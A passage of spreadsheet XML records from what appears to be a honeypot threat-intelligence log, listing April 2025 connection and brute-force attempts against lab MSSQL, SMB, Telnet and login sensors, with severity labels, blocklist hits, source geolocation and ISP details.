    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Brute Force"/>
    <s v="high"/>
    <s v="SMA-LAB_corporatelogin_Login.NIPPONINDIAIM_HC1"/>
    <s v="443"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="SG"/>
    <s v="Singapore"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="Novena"/>
    <s v="7281987"/>
    <s v="NA"/>
    <s v="1.31697"/>
    <s v="103.844"/>
    <s v="45143"/>
    <s v="SINGTELMOBILE-AS-AP"/>
    <s v="Singapore Telecom Mobile Pte Ltd"/>
    <s v="consumer"/>
    <s v="Singapore Telecom Mobile Pte Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login"/>
    <s v="{HTTP_LOGIN:Mozilla/5.0 (iPhone; CPU iPhone OS 18_4_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/364.0.744893471 Mobile/15E148 Safari/604.1}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:77ea:150e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="High"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1489"/>
    <x v="1489"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T12:49:20"/>
    <d v="2025-03-06T08:42:11"/>
    <d v="2025-04-16T12:49:20"/>
    <n v="13"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Connaught Lane)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6306"/>
    <s v="77.2239"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NIB"/>
    <s v="2007-08-01"/>
    <s v="BSNLNET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f0:8dfc"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1490"/>
    <x v="1490"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T12:44:55"/>
    <d v="2025-04-16T12:43:15"/>
    <d v="2025-04-16T12:44:55"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="AC"/>
    <s v="Aceh"/>
    <s v="Pidie Jaya Regency"/>
    <s v="Lueng Putu"/>
    <s v="6699784"/>
    <s v="NA"/>
    <s v="5.25724"/>
    <s v="96.0649"/>
    <s v="141672"/>
    <s v="PT Nuansa Online Mitrakom"/>
    <s v="PT Nuansa Online Mitrakom"/>
    <s v="business"/>
    <s v="Nuansaaceh"/>
    <s v="2023-10-17"/>
    <s v="NUANSAACEH-ID"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6743:31d2"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1491"/>
    <x v="1491"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T12:41:23"/>
    <d v="2023-11-28T13:31:19"/>
    <d v="2025-04-16T12:41:23"/>
    <n v="385"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Incomming Traffic&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H13&amp;&amp;SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;10507&amp;&amp;59136&amp;&amp;1433"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']}"/>
    <n v="61"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JB"/>
    <s v="West Java"/>
    <s v="Kota Cimahi"/>
    <s v="Cimahi"/>
    <s v="1646448"/>
    <s v="NA"/>
    <s v="-6.89536"/>
    <s v="107.542"/>
    <s v="139993"/>
    <s v="PT. FORIT ASTA SOLUSINDO"/>
    <s v="PT. FORIT ASTA SOLUSINDO"/>
    <s v="business"/>
    <s v="PT. FORIT ASTA SOLUSINDO"/>
    <s v="2020-02-11"/>
    <s v="IDNIC-SEKOLAHAN-ID"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.148.113.136,53140)}&amp;&amp;{Data_SMB:Incoming connection (103.148.113.136,53455)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.148.113.136,51229)}&amp;&amp;{Data_SMB:Incoming connection (103.148.113.136,59367)}&amp;&amp;{Data_SMB:Incoming connection (103.148.113.136,59929)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6794:7188"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1492"/>
    <x v="1492"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T12:41:04"/>
    <d v="2025-04-16T12:38:56"/>
    <d v="2025-04-16T12:41:04"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="3306&amp;&amp;1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="49"/>
    <s v="Vĩnh Long Province"/>
    <s v="Tam Bình District"/>
    <s v="Tam Bình"/>
    <s v="1567201"/>
    <s v="NA"/>
    <s v="10.0481"/>
    <s v="106.0"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VNPT"/>
    <s v="business"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="2010-08-16"/>
    <s v="VNPT-VN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ebf:62ca"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1493"/>
    <x v="1493"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T12:36:34"/>
    <d v="2025-02-18T18:11:07"/>
    <d v="2025-04-16T12:36:34"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H43"/>
    <s v="1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Coimbatore"/>
    <s v="Coimbatore"/>
    <s v="1273865"/>
    <s v="641018"/>
    <s v="11.0176"/>
    <s v="76.9674"/>
    <s v="58898"/>
    <s v="Rainbow communications India Pvt Ltd"/>
    <s v="Rainbow communications India Pvt Ltd"/>
    <s v="business"/>
    <s v="Sangakpm"/>
    <s v="None"/>
    <s v="SANGAKPM"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.93.104.13,59009)}&amp;&amp;{Data_SMB:Incoming connection (103.93.104.13,59600)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:675d:680d"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1494"/>
    <x v="1494"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T12:30:24"/>
    <d v="2025-02-14T12:33:48"/>
    <d v="2025-04-16T12:30:24"/>
    <n v="23"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H43"/>
    <s v="1433&amp;&amp;445&amp;&amp;54578&amp;&amp;55291"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Ramanathapuram"/>
    <s v="Paramagudi"/>
    <s v="1260387"/>
    <s v="NA"/>
    <s v="9.54633"/>
    <s v="78.5907"/>
    <s v="134877"/>
    <s v="Sri Vari Network Private Limited"/>
    <s v="Sri Vari Network Private Limited"/>
    <s v="business"/>
    <s v="Sri Vari Network Private Limited"/>
    <s v="2016-01-21"/>
    <s v="SRIVARI"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (210.16.85.38,54578)}&amp;&amp;{Data_SMB:Incoming connection (210.16.85.38,55291)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;NA&amp;&amp;{Data_SMB:Incoming connection (210.16.85.38,65402)}&amp;&amp;{Data_SMB:Incoming connection (210.16.85.38,49997)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d210:5526"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1495"/>
    <x v="1495"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T12:20:21"/>
    <d v="2025-04-16T12:18:32"/>
    <d v="2025-04-16T12:20:21"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Okhla Phase III)"/>
    <s v="1261481"/>
    <s v="110049"/>
    <s v="28.5493"/>
    <s v="77.2678"/>
    <s v="9498"/>
    <s v="Bharti Airtel Limited"/>
    <s v="Bharti Airtel Limited"/>
    <s v="business"/>
    <s v="Bharti Airtel Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b64e:fd52"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1496"/>
    <x v="1496"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T12:10:30"/>
    <d v="2025-01-12T19:26:44"/>
    <d v="2025-04-16T12:10:30"/>
    <n v="24"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Butte"/>
    <s v="Chico"/>
    <s v="5336269"/>
    <s v="95926"/>
    <s v="39.7483"/>
    <s v="-121.843"/>
    <s v="7922"/>
    <s v="Comcast Cable Communications, LLC"/>
    <s v="Comcast Cable Communications"/>
    <s v="residential"/>
    <s v="S WIRELESS INC"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:4b93:ec56"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1497"/>
    <x v="1497"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T12:02:18"/>
    <d v="2023-07-27T10:01:22"/>
    <d v="2025-04-16T12:02:18"/>
    <n v="1315"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_HTTP_H25&amp;&amp;SMA-LAB_SOCKS5_H22&amp;&amp;SMA-LAB_SSH_H24&amp;&amp;SMA-LAB_VNC_H3&amp;&amp;SMA-LAB_HTTPS_H45&amp;&amp;SMA-LAB_LDAP_H21&amp;&amp;SMA-LAB_SMB_H39&amp;&amp;SMA-LAB_PJL_H30&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_H35"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;80&amp;&amp;1080&amp;&amp;22&amp;&amp;5900&amp;&amp;443&amp;&amp;389&amp;&amp;445&amp;&amp;9100&amp;&amp;15979&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TS"/>
    <s v="Telangana"/>
    <s v="Hyderabad"/>
    <s v="Hyderabad (Avenue 4)"/>
    <s v="1269843"/>
    <s v="500013"/>
    <s v="17.4135"/>
    <s v="78.448"/>
    <s v="55577"/>
    <s v="Atria Convergence Technologies Pvt. Ltd.,"/>
    <s v="Beam Telecom Pvt Ltd"/>
    <s v="residential"/>
    <s v="Beam Telecom Pvt Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (49.207.14.254,52249)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (49.207.14.254,52032)}&amp;&amp;{Data_SMB:Incoming connection (49.207.14.254,52900)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (49.207.14.254,49636)}&amp;&amp;{Data_SMB:Incoming connection (49.207.14.254,50179)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (49.207.14.254,57052)}&amp;&amp;{Data_SMB:Incoming connection (49.207.14.254,57782)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (49.207.14.254,58437)}&amp;&amp;{Data_SMB:Incoming connection (49.207.14.254,58879)}&amp;&amp;{Data_SMB:Incoming connection (49.207.14.254,63170)}&amp;&amp;{Data_SMB:Incoming connection (49.207.14.254,63621)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (49.207.14.254,62292)}&amp;&amp;{Data_SMB:Incoming connection (49.207.14.254,64276)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (49.207.14.254,52431)}&amp;&amp;{Data_SMB:Incoming connection (49.207.14.254,53282)}&amp;&amp;{Data_SMB:Incoming connection (49.207.14.254,56373)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:31cf:efe"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1498"/>
    <x v="1498"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T11:49:22"/>
    <d v="2025-04-16T11:48:27"/>
    <d v="2025-04-16T11:49:22"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JB"/>
    <s v="West Java"/>
    <s v="Kabupaten Sumedang"/>
    <s v="Sumedang"/>
    <s v="1626103"/>
    <s v="NA"/>
    <s v="-6.8586100000000005"/>
    <s v="107.916"/>
    <s v="9341"/>
    <s v="PT Indonesia Comnets Plus"/>
    <s v="PT. Indonesia Comnet Plus"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ca2e:4471"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1499"/>
    <x v="1499"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T11:47:17"/>
    <d v="2025-04-16T11:47:17"/>
    <d v="2025-04-16T11:47:17"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']}"/>
    <n v="72"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JB"/>
    <s v="West Java"/>
    <s v="Bandung Regency"/>
    <s v="Cileunyi"/>
    <s v="1646492"/>
    <s v="NA"/>
    <s v="-6.93889"/>
    <s v="107.753"/>
    <s v="55699"/>
    <s v="STARNET-AS-ID"/>
    <s v="PT. Cemerlang Multimedia"/>
    <s v="corporate"/>
    <s v="PT Aksara Perdana Multimedia"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6793:9a6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1500"/>
    <x v="1500"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T11:30:05"/>
    <d v="2025-04-16T10:54:03"/>
    <d v="2025-04-16T11:30:05"/>
    <n v="46"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="WB"/>
    <s v="West Bengal"/>
    <s v="Medinipur East"/>
    <s v="Tamlūk"/>
    <s v="1255046"/>
    <s v="NA"/>
    <s v="22.3008"/>
    <s v="87.9259"/>
    <s v="135872"/>
    <s v="GTPL KCBPL BROADBAND PVT LTD"/>
    <s v="Gtpl Kcbpl Broadband PVT LTD"/>
    <s v="residential"/>
    <s v="Raiganj Cable TV PVT LTD"/>
    <s v="2021-11-03"/>
    <s v="RCTVPL"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67af:a9d4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1501"/>
    <x v="1501"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T11:21:54"/>
    <d v="2025-04-16T11:21:54"/>
    <d v="2025-04-16T11:21:54"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Brute Force"/>
    <s v="high"/>
    <s v="SMA-LAB_corporatelogin_Login.NIPPONINDIAIM_HC1"/>
    <s v="443"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="SG"/>
    <s v="Singapore"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="Singapore (Queenstown Estate)"/>
    <s v="1880252"/>
    <s v="139963"/>
    <s v="1.29618"/>
    <s v="103.791"/>
    <s v="53813"/>
    <s v="ZSCALER-INC"/>
    <s v="Zscaler, Inc."/>
    <s v="hosting"/>
    <s v="Zscaler, Inc."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login"/>
    <s v="{HTTP_LOGIN:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a5e1:7117"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="High"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1502"/>
    <x v="1502"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T11:17:28"/>
    <d v="2024-07-11T14:03:00"/>
    <d v="2025-04-16T11:17:28"/>
    <n v="24"/>
    <s v="SQTK_GTDN"/>
